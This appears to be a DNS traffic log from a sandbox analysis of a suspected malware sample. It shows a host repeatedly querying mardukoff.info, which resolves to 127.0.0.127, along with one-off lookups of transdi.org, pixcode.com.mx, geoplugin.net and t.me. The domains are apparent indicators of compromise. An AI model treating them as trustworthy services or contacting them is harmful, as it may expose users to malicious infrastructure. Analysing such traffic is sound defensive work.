Sep 28, 2023 06:04:04.757143021 CEST	192.168.2.3	8.8.8.8	0x38c1	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:06.251590967 CEST	192.168.2.3	8.8.8.8	0xeca4	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:07.814090967 CEST	192.168.2.3	8.8.8.8	0x6d9e	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:09.455094099 CEST	192.168.2.3	8.8.8.8	0x60c4	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:10.956208944 CEST	192.168.2.3	8.8.8.8	0xe8a7	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:12.455519915 CEST	192.168.2.3	8.8.8.8	0xd100	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:14.021735907 CEST	192.168.2.3	8.8.8.8	0xea24	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:15.826355934 CEST	192.168.2.3	8.8.8.8	0xa2ce	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:17.314559937 CEST	192.168.2.3	8.8.8.8	0xb152	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:18.814215899 CEST	192.168.2.3	8.8.8.8	0xe4	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:20.455151081 CEST	192.168.2.3	8.8.8.8	0xb6b4	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:22.018085957 CEST	192.168.2.3	8.8.8.8	0x4056	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:23.644385099 CEST	192.168.2.3	8.8.8.8	0x1642	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:25.143450022 CEST	192.168.2.3	8.8.8.8	0xeb72	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:26.714020967 CEST	192.168.2.3	8.8.8.8	0x9741	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:28.205857992 CEST	192.168.2.3	8.8.8.8	0x9c89	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:29.752717972 CEST	192.168.2.3	8.8.8.8	0xbb27	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:31.268170118 CEST	192.168.2.3	8.8.8.8	0xd89a	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:32.814217091 CEST	192.168.2.3	8.8.8.8	0xe57b	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:34.455697060 CEST	192.168.2.3	8.8.8.8	0x9559	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:36.018604040 CEST	192.168.2.3	8.8.8.8	0xd816	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:37.517965078 CEST	192.168.2.3	8.8.8.8	0xdc8d	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:39.146733046 CEST	192.168.2.3	8.8.8.8	0x22	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:40.706398964 CEST	192.168.2.3	8.8.8.8	0x891b	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:42.254261017 CEST	192.168.2.3	8.8.8.8	0x2a91	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:43.752412081 CEST	192.168.2.3	8.8.8.8	0xad56	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:45.518384933 CEST	192.168.2.3	8.8.8.8	0x6a6d	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:47.018479109 CEST	192.168.2.3	8.8.8.8	0x7526	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:47.486953974 CEST	192.168.2.3	8.8.8.8	0x9217	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:49.017967939 CEST	192.168.2.3	8.8.8.8	0x79c4	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:50.642728090 CEST	192.168.2.3	8.8.8.8	0x787f	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:52.205854893 CEST	192.168.2.3	8.8.8.8	0xf51	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:53.752157927 CEST	192.168.2.3	8.8.8.8	0x480c	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:55.251744986 CEST	192.168.2.3	8.8.8.8	0xb5df	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:56.823581934 CEST	192.168.2.3	8.8.8.8	0x2f16	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:58.455416918 CEST	192.168.2.3	8.8.8.8	0x87e4	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:59.955661058 CEST	192.168.2.3	8.8.8.8	0xfde1	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:01.456950903 CEST	192.168.2.3	8.8.8.8	0x4c43	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:03.017791033 CEST	192.168.2.3	8.8.8.8	0x4ca1	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:04.642312050 CEST	192.168.2.3	8.8.8.8	0xcb73	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:06.205029011 CEST	192.168.2.3	8.8.8.8	0x67e3	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:07.704914093 CEST	192.168.2.3	8.8.8.8	0xa668	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:09.251626968 CEST	192.168.2.3	8.8.8.8	0xe66b	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:10.751912117 CEST	192.168.2.3	8.8.8.8	0x6827	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:12.252154112 CEST	192.168.2.3	8.8.8.8	0x9d40	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:13.814271927 CEST	192.168.2.3	8.8.8.8	0xdf91	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:15.314929008 CEST	192.168.2.3	8.8.8.8	0x4928	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:16.954664946 CEST	192.168.2.3	8.8.8.8	0x537d	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:18.518348932 CEST	192.168.2.3	8.8.8.8	0xbf6a	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:20.142421961 CEST	192.168.2.3	8.8.8.8	0x8d47	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:21.704576015 CEST	192.168.2.3	8.8.8.8	0xcb1e	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:23.454513073 CEST	192.168.2.3	8.8.8.8	0x1a92	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:24.955686092 CEST	192.168.2.3	8.8.8.8	0x8dc2	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:26.525408983 CEST	192.168.2.3	8.8.8.8	0xd8cf	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:28.018086910 CEST	192.168.2.3	8.8.8.8	0xea	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:29.642808914 CEST	192.168.2.3	8.8.8.8	0xe658	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:31.143083096 CEST	192.168.2.3	8.8.8.8	0x929	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:32.704852104 CEST	192.168.2.3	8.8.8.8	0x7a83	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:34.407767057 CEST	192.168.2.3	8.8.8.8	0x45e	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:36.017805099 CEST	192.168.2.3	8.8.8.8	0x3593	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:37.646495104 CEST	192.168.2.3	8.8.8.8	0x7315	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:39.204844952 CEST	192.168.2.3	8.8.8.8	0x1b5d	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:40.753181934 CEST	192.168.2.3	8.8.8.8	0xcfb1	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:42.251802921 CEST	192.168.2.3	8.8.8.8	0xbca7	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:43.819346905 CEST	192.168.2.3	8.8.8.8	0xade8	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:45.457916975 CEST	192.168.2.3	8.8.8.8	0x49e	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:47.018054008 CEST	192.168.2.3	8.8.8.8	0xd16d	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:48.643064976 CEST	192.168.2.3	8.8.8.8	0xacc6	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:50.238380909 CEST	192.168.2.3	8.8.8.8	0x8dfd	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:51.954399109 CEST	192.168.2.3	8.8.8.8	0x16fd	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:53.518309116 CEST	192.168.2.3	8.8.8.8	0xf4dd	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:55.141902924 CEST	192.168.2.3	8.8.8.8	0xf582	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 28, 2023 06:01:52.268106937 CEST	8.8.8.8	192.168.2.3	0x6e27	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:01:52.632922888 CEST	8.8.8.8	192.168.2.3	0x46ab	No error (0)	transdi.org	157.90.36.211	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:01:54.425152063 CEST	8.8.8.8	192.168.2.3	0xe929	No error (0)	pixcode.com.mx	192.185.131.188	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:01:56.243161917 CEST	8.8.8.8	192.168.2.3	0xca3b	No error (0)	geoplugin.net	178.237.33.50	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:01:57.178205967 CEST	8.8.8.8	192.168.2.3	0x1f55	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:01:57.453468084 CEST	8.8.8.8	192.168.2.3	0x994b	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:01.009546041 CEST	8.8.8.8	192.168.2.3	0x6dd5	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:05.833375931 CEST	8.8.8.8	192.168.2.3	0x3651	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:07.137016058 CEST	8.8.8.8	192.168.2.3	0x3651	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:08.667557001 CEST	8.8.8.8	192.168.2.3	0x8bfb	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:11.278811932 CEST	8.8.8.8	192.168.2.3	0x3694	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:16.035126925 CEST	8.8.8.8	192.168.2.3	0x3528	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:17.720834017 CEST	8.8.8.8	192.168.2.3	0x3528	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:18.638284922 CEST	8.8.8.8	192.168.2.3	0xfcaf	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:21.256705999 CEST	8.8.8.8	192.168.2.3	0x7ac0	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:25.014231920 CEST	8.8.8.8	192.168.2.3	0xe04a	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:28.759562969 CEST	8.8.8.8	192.168.2.3	0x4b09	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:31.372854948 CEST	8.8.8.8	192.168.2.3	0xb189	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:34.003343105 CEST	8.8.8.8	192.168.2.3	0x6c84	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:36.630558968 CEST	8.8.8.8	192.168.2.3	0xe732	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:39.251857042 CEST	8.8.8.8	192.168.2.3	0x47ca	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:42.025074959 CEST	8.8.8.8	192.168.2.3	0x18a7	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:44.651746988 CEST	8.8.8.8	192.168.2.3	0x28d8	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:47.293508053 CEST	8.8.8.8	192.168.2.3	0xb5ac	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:49.923060894 CEST	8.8.8.8	192.168.2.3	0x2e35	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:52.559290886 CEST	8.8.8.8	192.168.2.3	0xf82b	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:55.183496952 CEST	8.8.8.8	192.168.2.3	0x3285	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:57.852036953 CEST	8.8.8.8	192.168.2.3	0xa25d	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:59.339616060 CEST	8.8.8.8	192.168.2.3	0x6f37	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:00.826630116 CEST	8.8.8.8	192.168.2.3	0x195b	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:02.358766079 CEST	8.8.8.8	192.168.2.3	0xff6	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:03.864959955 CEST	8.8.8.8	192.168.2.3	0xc405	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:05.352438927 CEST	8.8.8.8	192.168.2.3	0x5a02	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:06.819865942 CEST	8.8.8.8	192.168.2.3	0x2970	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:10.331697941 CEST	8.8.8.8	192.168.2.3	0xf89	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:10.790951014 CEST	8.8.8.8	192.168.2.3	0xf89	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:11.391381979 CEST	8.8.8.8	192.168.2.3	0xf89	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:11.824497938 CEST	8.8.8.8	192.168.2.3	0x4c23	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:13.307112932 CEST	8.8.8.8	192.168.2.3	0x283e	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:14.777721882 CEST	8.8.8.8	192.168.2.3	0xc869	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:16.368856907 CEST	8.8.8.8	192.168.2.3	0xe632	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:17.868592024 CEST	8.8.8.8	192.168.2.3	0x14e9	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:19.504087925 CEST	8.8.8.8	192.168.2.3	0xbc07	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:21.054369926 CEST	8.8.8.8	192.168.2.3	0xa0e4	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:22.601128101 CEST	8.8.8.8	192.168.2.3	0x55ac	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:24.101625919 CEST	8.8.8.8	192.168.2.3	0xd80e	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:25.665723085 CEST	8.8.8.8	192.168.2.3	0xb566	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:27.167010069 CEST	8.8.8.8	192.168.2.3	0xbdd2	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:28.807364941 CEST	8.8.8.8	192.168.2.3	0x8e36	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:30.309215069 CEST	8.8.8.8	192.168.2.3	0xeca0	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:31.867543936 CEST	8.8.8.8	192.168.2.3	0xbdb4	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:33.493050098 CEST	8.8.8.8	192.168.2.3	0x5060	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:35.167251110 CEST	8.8.8.8	192.168.2.3	0xca41	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:36.664720058 CEST	8.8.8.8	192.168.2.3	0xad8c	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:38.320497990 CEST	8.8.8.8	192.168.2.3	0xeb06	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:39.959136009 CEST	8.8.8.8	192.168.2.3	0x33d2	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:41.491180897 CEST	8.8.8.8	192.168.2.3	0x3797	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:43.104634047 CEST	8.8.8.8	192.168.2.3	0x7ac3	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:44.803764105 CEST	8.8.8.8	192.168.2.3	0x8c28	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:46.309901953 CEST	8.8.8.8	192.168.2.3	0xa8ab	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:47.872764111 CEST	8.8.8.8	192.168.2.3	0x5507	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:49.492672920 CEST	8.8.8.8	192.168.2.3	0x9770	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:51.057986021 CEST	8.8.8.8	192.168.2.3	0x4b70	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:52.601519108 CEST	8.8.8.8	192.168.2.3	0xe8d1	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:54.106312990 CEST	8.8.8.8	192.168.2.3	0xc646	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:55.664120913 CEST	8.8.8.8	192.168.2.3	0x95c6	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:57.304140091 CEST	8.8.8.8	192.168.2.3	0x814e	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:58.891202927 CEST	8.8.8.8	192.168.2.3	0xd1ec	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:00.554404020 CEST	8.8.8.8	192.168.2.3	0xbade	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:01.024743080 CEST	8.8.8.8	192.168.2.3	0xf42a	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:03.562879086 CEST	8.8.8.8	192.168.2.3	0xe795	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:04.554912090 CEST	8.8.8.8	192.168.2.3	0xe795	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:05.102572918 CEST	8.8.8.8	192.168.2.3	0x38c1	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:06.598918915 CEST	8.8.8.8	192.168.2.3	0xeca4	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:08.159667969 CEST	8.8.8.8	192.168.2.3	0x6d9e	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:09.803488016 CEST	8.8.8.8	192.168.2.3	0x60c4	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:11.302782059 CEST	8.8.8.8	192.168.2.3	0xe8a7	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:12.802385092 CEST	8.8.8.8	192.168.2.3	0xd100	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:14.369601011 CEST	8.8.8.8	192.168.2.3	0xea24	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:16.172080994 CEST	8.8.8.8	192.168.2.3	0xa2ce	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:17.665863991 CEST	8.8.8.8	192.168.2.3	0xb152	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:19.163638115 CEST	8.8.8.8	192.168.2.3	0xe4	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:20.806746006 CEST	8.8.8.8	192.168.2.3	0xb6b4	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:22.365608931 CEST	8.8.8.8	192.168.2.3	0x4056	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:23.991184950 CEST	8.8.8.8	192.168.2.3	0x1642	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:25.490632057 CEST	8.8.8.8	192.168.2.3	0xeb72	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:27.061511040 CEST	8.8.8.8	192.168.2.3	0x9741	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:28.554563046 CEST	8.8.8.8	192.168.2.3	0x9c89	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:30.098606110 CEST	8.8.8.8	192.168.2.3	0xbb27	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:31.614036083 CEST	8.8.8.8	192.168.2.3	0xd89a	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:33.164001942 CEST	8.8.8.8	192.168.2.3	0xe57b	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:34.803116083 CEST	8.8.8.8	192.168.2.3	0x9559	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:36.365201950 CEST	8.8.8.8	192.168.2.3	0xd816	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:37.867058992 CEST	8.8.8.8	192.168.2.3	0xdc8d	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:39.493412971 CEST	8.8.8.8	192.168.2.3	0x22	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:41.055499077 CEST	8.8.8.8	192.168.2.3	0x891b	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:42.599716902 CEST	8.8.8.8	192.168.2.3	0x2a91	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:44.100550890 CEST	8.8.8.8	192.168.2.3	0xad56	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:45.869626999 CEST	8.8.8.8	192.168.2.3	0x6a6d	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:47.365052938 CEST	8.8.8.8	192.168.2.3	0x7526	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:47.832494974 CEST	8.8.8.8	192.168.2.3	0x9217	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:49.365827084 CEST	8.8.8.8	192.168.2.3	0x79c4	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:50.993376017 CEST	8.8.8.8	192.168.2.3	0x787f	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:52.555506945 CEST	8.8.8.8	192.168.2.3	0xf51	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:54.101025105 CEST	8.8.8.8	192.168.2.3	0x480c	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:55.597212076 CEST	8.8.8.8	192.168.2.3	0xb5df	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:57.170309067 CEST	8.8.8.8	192.168.2.3	0x2f16	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
